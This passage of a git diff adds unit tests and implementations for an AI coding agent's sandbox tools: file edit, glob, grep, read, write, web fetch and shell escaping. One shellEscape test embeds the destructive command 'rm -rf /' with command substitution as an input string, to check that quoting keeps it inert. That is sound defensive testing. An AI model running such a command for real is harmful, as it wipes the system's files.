+  it("rejects ambiguous edits (multiple matches without replaceAll)", async () => {
+    const sandbox = makeSandbox("foo\nfoo\nbar");
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await editFileTool.execute!(
+      { filePath: "a.txt", oldString: "foo", newString: "baz" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; error: string };
+    expect(outcome.success).toBe(false);
+    expect(outcome.error).toMatch(/2 times/);
+  });
+
+  it("replaces all occurrences when replaceAll:true", async () => {
+    // Three occurrences of "foo", all of which must be rewritten.
+    const sandbox = makeSandbox("foo bar foo baz foo");
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await editFileTool.execute!(
+      { filePath: "a.txt", oldString: "foo", newString: "qux", replaceAll: true },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; replacements: number };
+    expect(outcome.success).toBe(true);
+    expect(outcome.replacements).toBe(3);
+    expect(sandbox.getStored()).toBe("qux bar qux baz qux");
+  });
+});
diff --git a/lib/agent/tools/__tests__/globTool.test.ts b/lib/agent/tools/__tests__/globTool.test.ts
new file mode 100644
index 000000000..3f35d0a71
--- /dev/null
+++ b/lib/agent/tools/__tests__/globTool.test.ts
@@ -0,0 +1,97 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { globTool } from "@/lib/agent/tools/globTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(execMock: ReturnType<typeof vi.fn>) {
+  return { exec: execMock, workingDirectory: "/sandbox/mono" };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("globTool", () => {
+  it("parses `mtime\\tsize\\tpath` output into structured file entries", async () => {
+    // Two files, newest first (sort already happens server-side in the command).
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout:
+          "1700000000.0\t512\t/sandbox/mono/src/index.ts\n1699999000.5\t256\t/sandbox/mono/src/util.ts",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await globTool.execute!({ pattern: "**/*.ts" }, {
+      experimental_context: ctx,
+    } as never)) as {
+      success: boolean;
+      count: number;
+      files: Array<{ path: string; size: number; modifiedAt: string }>;
+    };
+    expect(outcome.success).toBe(true);
+    expect(outcome.count).toBe(2);
+    const newest = outcome.files[0];
+    expect(newest?.path).toBe("src/index.ts");
+    expect(newest?.size).toBe(512);
+    expect(typeof newest?.modifiedAt).toBe("string"); // ISO
+  });
+
+  it("emits a recursive find (no -maxdepth) for `**/*.ts`", async () => {
+    // Empty stdout: only the command string handed to `exec` is under test.
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    await globTool.execute!({ pattern: "**/*.ts" }, { experimental_context: ctx } as never);
+    const issuedCommand = sandbox.exec.mock.calls[0]?.[0] as string;
+    expect(issuedCommand).not.toContain("-maxdepth");
+  });
+
+  it("emits -maxdepth 1 for a bare `*.json` pattern (no recursion)", async () => {
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    await globTool.execute!({ pattern: "*.json" }, { experimental_context: ctx } as never);
+    const issuedCommand = sandbox.exec.mock.calls[0]?.[0];
+    expect(issuedCommand).toMatch(/-maxdepth\s+1/);
+  });
+
+  it("returns success:false on non-1 exit codes", async () => {
+    // Exit code 2 with output on stdout; the error message must carry the exit code.
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 2,
+        stdout: "err",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await globTool.execute!({ pattern: "**/*.ts" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(outcome.success).toBe(false);
+    expect(outcome.error).toMatch(/exit 2/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/grepTool.test.ts b/lib/agent/tools/__tests__/grepTool.test.ts
new file mode 100644
index 000000000..e3545f501
--- /dev/null
+++ b/lib/agent/tools/__tests__/grepTool.test.ts
@@ -0,0 +1,103 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(execMock: ReturnType<typeof vi.fn>) {
+  return { exec: execMock, workingDirectory: "/sandbox/mono" };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("grepTool", () => {
+  it("parses `file:line:content` output into structured matches", async () => {
+    // Three hits across two files (a.ts twice, b.ts once).
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout:
+          "/sandbox/mono/src/a.ts:5:export function login() {\n/sandbox/mono/src/a.ts:42:  login();\n/sandbox/mono/src/b.ts:7:login()",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await grepTool.execute!({ pattern: "login", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as {
+      success: boolean;
+      matches: Array<{ file: string; line: number; content: string }>;
+      filesWithMatches: number;
+    };
+    expect(outcome.success).toBe(true);
+    expect(outcome.matches).toHaveLength(3);
+    expect(outcome.matches[0]).toEqual({
+      file: "src/a.ts",
+      line: 5,
+      content: "export function login() {",
+    });
+    expect(outcome.filesWithMatches).toBe(2);
+  });
+
+  it("treats exit code 1 (no matches) as success:true with empty matches", async () => {
+    // The sandbox reports exit 1 as success:false; the tool must not pass that through.
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 1,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await grepTool.execute!({ pattern: "nothing", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; matchCount: number };
+    expect(outcome.success).toBe(true);
+    expect(outcome.matchCount).toBe(0);
+  });
+
+  it("returns success:false for real grep errors (non-1 exit)", async () => {
+    // Exit 2 with a message on stderr — must surface as an error, unlike exit 1.
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 2,
+        stdout: "",
+        stderr: "grep: invalid regex",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await grepTool.execute!({ pattern: "[", path: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(outcome.success).toBe(false);
+    expect(outcome.error).toMatch(/invalid regex/);
+  });
+
+  it("passes -i for caseSensitive:false", async () => {
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    await grepTool.execute!({ pattern: "x", path: ".", caseSensitive: false }, {
+      experimental_context: ctx,
+    } as never);
+    const issuedCommand = sandbox.exec.mock.calls[0]?.[0];
+    expect(issuedCommand).toContain(" -i ");
+  });
+});
diff --git a/lib/agent/tools/__tests__/readFileTool.test.ts b/lib/agent/tools/__tests__/readFileTool.test.ts
new file mode 100644
index 000000000..6d1d27fa3
--- /dev/null
+++ b/lib/agent/tools/__tests__/readFileTool.test.ts
@@ -0,0 +1,89 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+};
+
+/**
+ * Sandbox double with inert `stat` / `readFile` mocks.
+ * Fields in `over` win on key clashes.
+ */
+function makeSandbox(over: Record<string, unknown> = {}) {
+  const defaults = { workingDirectory: "/sandbox/mono", stat: vi.fn(), readFile: vi.fn() };
+  return { ...defaults, ...over };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("readFileTool", () => {
+  it("reads a file and returns numbered lines", async () => {
+    // Three-line file; every returned line is prefixed with its 1-based number.
+    const sandbox = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 10, mtimeMs: 0 }),
+      readFile: vi.fn().mockResolvedValue("line one\nline two\nline three"),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await readFileTool.execute!({ filePath: "README.md" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; content: string; totalLines: number; path: string };
+    expect(outcome.success).toBe(true);
+    expect(outcome.totalLines).toBe(3);
+    expect(outcome.content).toBe("1: line one\n2: line two\n3: line three");
+    expect(outcome.path).toBe("README.md");
+  });
+
+  it("honors offset + limit (1-indexed)", async () => {
+    // Five single-letter lines: a..e.
+    const sandbox = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 0, mtimeMs: 0 }),
+      readFile: vi.fn().mockResolvedValue("a\nb\nc\nd\ne"),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await readFileTool.execute!({ filePath: "x.txt", offset: 2, limit: 2 }, {
+      experimental_context: ctx,
+    } as never)) as { content: string; startLine: number; endLine: number };
+    expect(outcome.startLine).toBe(2);
+    // `endLine` is the last line included (1-indexed). With offset=2,limit=2
+    // we read lines 2 + 3 of a 5-line file, so endLine=3.
+    expect(outcome.endLine).toBe(3);
+    expect(outcome.content).toBe("2: b\n3: c");
+  });
+
+  it("rejects directories", async () => {
+    // Only `stat` is stubbed; it reports a directory.
+    const sandbox = makeSandbox({
+      stat: vi
+        .fn()
+        .mockResolvedValue({ isDirectory: () => true, isFile: () => false, size: 0, mtimeMs: 0 }),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await readFileTool.execute!({ filePath: "src" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(outcome.success).toBe(false);
+    expect(outcome.error).toMatch(/directory/i);
+  });
+
+  it("returns success:false with an error string on stat/readFile failure", async () => {
+    // `stat` rejects with "not found"; the message must surface in `error`.
+    const sandbox = makeSandbox({
+      stat: vi.fn().mockRejectedValue(new Error("not found")),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const outcome = (await readFileTool.execute!({ filePath: "missing.ts" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(outcome.success).toBe(false);
+    expect(outcome.error).toMatch(/not found/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/shellEscape.test.ts b/lib/agent/tools/__tests__/shellEscape.test.ts
new file mode 100644
index 000000000..699605129
--- /dev/null
+++ b/lib/agent/tools/__tests__/shellEscape.test.ts
@@ -0,0 +1,20 @@
+import { describe, it, expect } from "vitest";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+
+describe("shellEscape", () => {
+  it("wraps a plain string in single quotes", () => {
+    expect(shellEscape("hello")).toBe("'hello'");
+  });
+
+  it("escapes embedded single quotes via the standard ' → '\\'' dance", () => {
+    expect(shellEscape("it's")).toBe("'it'\\''s'"); // shell text: 'it'\''s'
+  });
+
+  it("handles strings with shell metacharacters unchanged inside single quotes", () => {
+    expect(shellEscape("$VAR `cmd` && rm -rf /")).toBe("'$VAR `cmd` && rm -rf /'");
+  });
+
+  it("returns just '' for the empty string", () => {
+    expect(shellEscape("")).toBe("''"); // '' is still one (empty) shell word
+  });
+});
diff --git a/lib/agent/tools/__tests__/toDisplayPath.test.ts b/lib/agent/tools/__tests__/toDisplayPath.test.ts
new file mode 100644
index 000000000..e862f7276
--- /dev/null
+++ b/lib/agent/tools/__tests__/toDisplayPath.test.ts
@@ -0,0 +1,29 @@
+import { describe, it, expect } from "vitest";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const WORKDIR = "/sandbox/mono";
+
+describe("toDisplayPath", () => {
+  it("strips the workingDirectory prefix when the file is inside", () => {
+    expect(toDisplayPath("/sandbox/mono/src/index.ts", WORKDIR)).toBe("src/index.ts");
+  });
+
+  it("returns `.` for the workingDirectory itself", () => {
+    expect(toDisplayPath("/sandbox/mono", WORKDIR)).toBe(".");
+  });
+
+  it("keeps an absolute path when it's outside the working directory", () => {
+    expect(toDisplayPath("/etc/hosts", WORKDIR)).toBe("/etc/hosts");
+  });
+
+  it("resolves a relative input against the working directory", () => {
+    expect(toDisplayPath("apps/web/page.tsx", WORKDIR)).toBe("apps/web/page.tsx");
+  });
+
+  it("normalizes back-slashes to forward slashes (Windows-style absolute input)", () => {
+    // On POSIX, path.resolve keeps the backslash as part of the segment name, so the
+    // helper itself must convert it; only the absence of "\" is asserted here.
+    const result = toDisplayPath("/tmp/win\\path", WORKDIR);
+    expect(result.includes("\\")).toBe(false);
+  });
+});
diff --git a/lib/agent/tools/__tests__/todoWriteTool.test.ts b/lib/agent/tools/__tests__/todoWriteTool.test.ts
new file mode 100644
index 000000000..7b5d88c9e
--- /dev/null
+++ b/lib/agent/tools/__tests__/todoWriteTool.test.ts
@@ -0,0 +1,28 @@
+import { describe, it, expect } from "vitest";
+import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
+
+describe("todoWriteTool", () => {
+  it("echoes the todos back with a count message", async () => {
+    const submitted = [
+      { id: "1", content: "ls the workspace", status: "in_progress" as const },
+      { id: "2", content: "summarize what we found", status: "pending" as const },
+    ];
+    const reply = (await todoWriteTool.execute!({ todos: submitted }, {} as never)) as {
+      success: boolean;
+      message: string;
+      todos: typeof submitted;
+    };
+    expect(reply.success).toBe(true);
+    expect(reply.message).toBe("Updated task list with 2 items");
+    expect(reply.todos).toEqual(submitted);
+  });
+
+  it("accepts an empty list", async () => {
+    const reply = (await todoWriteTool.execute!({ todos: [] }, {} as never)) as {
+      success: boolean;
+      message: string;
+    };
+    expect(reply.success).toBe(true);
+    expect(reply.message).toBe("Updated task list with 0 items");
+  });
+});
diff --git a/lib/agent/tools/__tests__/webFetchTool.test.ts b/lib/agent/tools/__tests__/webFetchTool.test.ts
new file mode 100644
index 000000000..47fb75c92
--- /dev/null
+++ b/lib/agent/tools/__tests__/webFetchTool.test.ts
@@ -0,0 +1,96 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(execMock: ReturnType<typeof vi.fn>) {
+  return { exec: execMock, workingDirectory: "/sandbox/mono" };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("webFetchTool", () => {
+  it("parses body + trailing status code on success", async () => {
+    // Body, then newline, then status code "200" (per the curl -w '%{http_code}' contract).
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: '{"ok":true}\n200',
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const response = (await webFetchTool.execute!({ url: "https://example.com/api" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; status: number; body: string; truncated: boolean };
+    expect(response).toEqual({
+      success: true,
+      status: 200,
+      body: '{"ok":true}',
+      truncated: false,
+    });
+  });
+
+  it("marks truncated:true on curl exit 23 (head -c cut off the body)", async () => {
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 23,
+        stdout: "huge body fragment\n200",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const response = (await webFetchTool.execute!({ url: "https://example.com/huge" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; truncated: boolean };
+    expect(response.success).toBe(true);
+    expect(response.truncated).toBe(true);
+  });
+
+  it("returns success:false on non-0, non-23 curl exit", async () => {
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: false,
+        exitCode: 7,
+        stdout: "",
+        stderr: "Failed to connect",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    const response = (await webFetchTool.execute!({ url: "https://example.com/unreachable" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(response.success).toBe(false);
+    expect(response.error).toMatch(/Failed to connect/);
+  });
+
+  it("passes the request body for POST", async () => {
+    const sandbox = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout: "ok\n201",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
+    await webFetchTool.execute!(
+      { url: "https://example.com/api", method: "POST", body: '{"x":1}' },
+      { experimental_context: ctx } as never,
+    );
+    const issuedCommand = sandbox.exec.mock.calls[0]?.[0] as string;
+    expect(issuedCommand).toContain("-X POST");
+    expect(issuedCommand).toContain("-d '{\"x\":1}'");
+  });
+});
diff --git a/lib/agent/tools/__tests__/writeFileTool.test.ts b/lib/agent/tools/__tests__/writeFileTool.test.ts
new file mode 100644
index 000000000..3656a777c
--- /dev/null
+++ b/lib/agent/tools/__tests__/writeFileTool.test.ts
@@ -0,0 +1,52 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+/** Sandbox double whose `mkdir`/`writeFile` resolve and whose `stat` reports a 42-byte file. */
+function makeSandbox(over: Record<string, unknown> = {}) {
+  const statResult = { size: 42, mtimeMs: 0, isDirectory: () => false, isFile: () => true };
+  const defaults = {
+    workingDirectory: "/sandbox/mono",
+    mkdir: vi.fn().mockResolvedValue(undefined),
+    writeFile: vi.fn().mockResolvedValue(undefined),
+    stat: vi.fn().mockResolvedValue(statResult),
+  };
+  return { ...defaults, ...over };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("writeFileTool", () => {
+  it("creates parent dirs and writes content via sandbox.writeFile", async () => {
+    const sb = makeSandbox();
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const outcome = (await writeFileTool.execute!(
+      { filePath: "src/index.ts", content: "export {}" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; path: string; bytesWritten: number };
+    expect(outcome.success).toBe(true);
+    expect(outcome.path).toBe("src/index.ts");
+    expect(outcome.bytesWritten).toBe(42);
+    expect(sb.mkdir).toHaveBeenCalledWith("/sandbox/mono/src", { recursive: true });
+    expect(sb.writeFile).toHaveBeenCalledWith("/sandbox/mono/src/index.ts", "export {}", "utf-8");
+  });
+
+  it("returns success:false on sandbox failure", async () => {
+    // `writeFile` rejects with EACCES; the message must surface in `error`.
+    const sb = makeSandbox({
+      writeFile: vi.fn().mockRejectedValue(new Error("EACCES")),
+    });
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const outcome = (await writeFileTool.execute!({ filePath: "a.ts", content: "x" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(outcome.success).toBe(false);
+    expect(outcome.error).toMatch(/EACCES/);
+  });
+});
diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts
index 908113812..479a608db 100644
--- a/lib/agent/tools/bashTool.ts
+++ b/lib/agent/tools/bashTool.ts
@@ -21,9 +21,9 @@ const bashInputSchema = z.object({
 });
 
 /**
- * Factory for the `bash` sandbox tool. Runs `bash -c "<command>"` inside
- * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's
- * working directory.
+ * `bash` sandbox tool. Runs `bash -c "<command>"` inside the agent's
+ * sandbox via `sandbox.exec`, defaulting cwd to the sandbox's working
+ * directory.
  *
  * Approval gating is intentionally absent — model-issued commands are
  * trusted in this PR. Add a host-side gate at the route/UI layer if that
@@ -34,9 +34,8 @@ const bashInputSchema = z.object({
  * the right org. Detached execs deliberately skip env injection — those
  * processes outlive the prompt.
  */
-export const bashTool = () =>
-  tool({
-    description: `Execute a bash command in the user's shell (non-interactive).
+export const bashTool = tool({
+  description: `Execute a bash command in the user's shell (non-interactive).
 
 WHEN TO USE:
 - Running existing project commands (build, test, lint, typecheck)
@@ -61,56 +60,56 @@ IMPORTANT:
 - Never use interactive commands (vim, nano, top, bash, ssh, etc.)
 - Always quote file paths that may contain spaces
 - Use detached: true to start dev servers / long-running processes in the background`,
-    inputSchema: bashInputSchema,
-    execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
-      const sandbox = await getSandbox(experimental_context, "bash");
-      const workingDirectory = sandbox.workingDirectory;
-      const workingDir = cwd
-        ? path.isAbsolute(cwd)
-          ? cwd
-          : path.resolve(workingDirectory, cwd)
-        : workingDirectory;
+  inputSchema: bashInputSchema,
+  execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
+    const sandbox = await getSandbox(experimental_context, "bash");
+    const workingDirectory = sandbox.workingDirectory;
+    const workingDir = cwd
+      ? path.isAbsolute(cwd)
+        ? cwd
+        : path.resolve(workingDirectory, cwd)
+      : workingDirectory;
 
-      if (detached) {
-        if (!sandbox.execDetached) {
-          return {
-            success: false,
-            exitCode: null,
-            stdout: "",
-            stderr:
-              "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
-          };
-        }
-        try {
-          const { commandId } = await sandbox.execDetached(command, workingDir);
-          return {
-            success: true,
-            exitCode: null,
-            stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
-            stderr: "",
-          };
-        } catch (error) {
-          return {
-            success: false,
-            exitCode: null,
-            stdout: "",
-            stderr: error instanceof Error ? error.message : String(error),
-          };
-        }
+    if (detached) {
+      if (!sandbox.execDetached) {
+        return {
+          success: false,
+          exitCode: null,
+          stdout: "",
+          stderr:
+            "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
+        };
       }
+      try {
+        const { commandId } = await sandbox.execDetached(command, workingDir);
+        return {
+          success: true,
+          exitCode: null,
+          stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
+          stderr: "",
+        };
+      } catch (error) {
+        return {
+          success: false,
+          exitCode: null,
+          stdout: "",
+          stderr: error instanceof Error ? error.message : String(error),
+        };
+      }
+    }
 
-      const recoupEnv = buildRecoupExecEnv(experimental_context);
-      const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
-        signal: abortSignal,
-        ...(recoupEnv ? { env: recoupEnv } : {}),
-      });
+    const recoupEnv = buildRecoupExecEnv(experimental_context);
+    const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
+      signal: abortSignal,
+      ...(recoupEnv ? { env: recoupEnv } : {}),
+    });
 
-      return {
-        success: result.success,
-        exitCode: result.exitCode,
-        stdout: result.stdout,
-        stderr: result.stderr,
-        ...(result.truncated && { truncated: true }),
-      };
-    },
-  });
+    return {
+      success: result.success,
+      exitCode: result.exitCode,
+      stdout: result.stdout,
+      stderr: result.stderr,
+      ...(result.truncated && { truncated: true }),
+    };
+  },
+});
diff --git a/lib/agent/tools/editFileTool.ts b/lib/agent/tools/editFileTool.ts
new file mode 100644
index 000000000..d8274c0bc
--- /dev/null
+++ b/lib/agent/tools/editFileTool.ts
@@ -0,0 +1,100 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+const editInputSchema = z.object({ // input contract for the `edit` tool
+  filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"),
+  oldString: z.string().describe("The exact text to replace"),
+  newString: z.string().describe("The text to replace it with (must differ from oldString)"),
+  replaceAll: z.boolean().optional().describe("Replace all occurrences. Default: false"),
+  startLine: z // NOTE(review): validated but never read by execute(), which computes its own — confirm intent
+    .number()
+    .optional()
+    .describe("Line number where oldString starts (for diff display)"),
+});
+
+/**
+ * `edit` — exact-string replacement inside a sandboxed file. Fails (without writing) when
+ * `oldString` equals `newString`, is absent, or matches more than once without `replaceAll`.
+ * `newString` is inserted verbatim; on success returns the display path, count and start line.
+ */
+export const editFileTool = tool({
+  description: `Perform exact string replacement in a file.
+
+WHEN TO USE:
+- Making small, precise edits to an existing file you have already read
+- Renaming a variable or identifier consistently within a single file
+- Changing a specific block of code or configuration exactly as seen in the read output
+
+WHEN NOT TO USE:
+- Creating new files (use writeFileTool instead)
+- Large structural rewrites where it's simpler to rewrite the entire file (use writeFileTool)
+
+USAGE:
+- Use workspace-relative file paths (e.g., "src/auth.ts")
+- You must read the file first with readFileTool in this conversation
+- Provide oldString as the EXACT text to replace, including whitespace and indentation
+- By default, oldString must be UNIQUE in the file; otherwise the edit will fail
+- Use replaceAll: true to change ALL occurrences (e.g., for a rename)
+- ALWAYS provide startLine when known: the line number where oldString begins
+
+IMPORTANT:
+- Preserve exact indentation and spacing from the file's content as returned by readFileTool
+- Never include line numbers or the "N: " line prefixes from the read output in oldString or newString
+- If oldString appears multiple times and replaceAll is false, the tool FAILS with an error and occurrence count`,
+  inputSchema: editInputSchema,
+  execute: async (
+    { filePath, oldString, newString, replaceAll = false },
+    { experimental_context },
+  ) => {
+    const sandbox = await getSandbox(experimental_context, "edit");
+    const workingDirectory = sandbox.workingDirectory;
+
+    try {
+      if (oldString === newString) {
+        return { success: false, error: "oldString and newString must be different" };
+      }
+
+      const absolutePath = path.isAbsolute(filePath)
+        ? filePath
+        : path.resolve(workingDirectory, filePath);
+      const content = await sandbox.readFile(absolutePath, "utf-8");
+
+      if (!content.includes(oldString)) {
+        return {
+          success: false,
+          error: "oldString not found in file",
+          hint: "Make sure to match exact whitespace and indentation",
+        };
+      }
+
+      const occurrences = content.split(oldString).length - 1; // non-overlapping match count
+      if (occurrences > 1 && !replaceAll) {
+        return {
+          success: false,
+          error: `oldString found ${occurrences} times. Use replaceAll=true or provide more context to make it unique.`,
+        };
+      }
+
+      const startLine = content.slice(0, content.indexOf(oldString)).split("\n").length;
+      // Replacer callbacks insert newString verbatim; a plain string would expand $&, $$, $` and $'.
+      const newContent = replaceAll
+        ? content.replaceAll(oldString, () => newString)
+        : content.replace(oldString, () => newString);
+
+      await sandbox.writeFile(absolutePath, newContent, "utf-8");
+
+      return {
+        success: true,
+        path: toDisplayPath(absolutePath, workingDirectory),
+        replacements: replaceAll ? occurrences : 1,
+        startLine, // 1-based line of the first match, measured on the pre-edit content
+      };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Failed to edit file: ${message}` };
+    }
+  },
+});
diff --git a/lib/agent/tools/globTool.ts b/lib/agent/tools/globTool.ts
new file mode 100644
index 000000000..d1de234d2
--- /dev/null
+++ b/lib/agent/tools/globTool.ts
@@ -0,0 +1,165 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { shellEscape } from "@/lib/agent/tools/shellEscape";
+import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath";
+
+interface FileInfo {
+  path: string; // display path produced by toDisplayPath
+  size: number; // second tab-separated field of a listing row (find `%s` / stat `%z`)
+  modifiedAt: number; // first field (mtime in seconds) multiplied by 1000
+}
+
+const globInputSchema = z.object({ // input contract for the `glob` tool
+  pattern: z.string().describe("Glob pattern to match (e.g., '**/*.ts')"),
+  path: z // optional; execute() falls back to the sandbox working directory
+    .string()
+    .optional()
+    .describe("Workspace-relative base directory to search from (e.g., src)"),
+  limit: z.number().optional().describe("Maximum number of results. Default: 100"),
+});
+
+const GLOB_TIMEOUT_MS = 30_000; // third argument to sandbox.exec for the find pipeline
+const DEFAULT_LIMIT = 100; // used when the caller omits `limit`
+
+/**
+ * `glob` — list files whose name matches a glob, newest mtime first, skipping hidden paths and
+ * `node_modules`. Tries GNU `find -printf`, then BSD `find | xargs stat`. `limit` is coerced to
+ * a non-negative integer before it reaches `head -n`; failures come back as `success: false`.
+ */
+export const globTool = tool({
+  description: `Find files matching a glob pattern.
+
+WHEN TO USE:
+- Locating files by extension or naming pattern (e.g., all *.test.ts files)
+- Discovering where components, migrations, or configs live
+- Getting a quick list of recently modified files of a given type
+
+WHEN NOT TO USE:
+- Searching inside file contents (use grepTool instead)
+- Reading file contents (use readFileTool instead)
+
+USAGE:
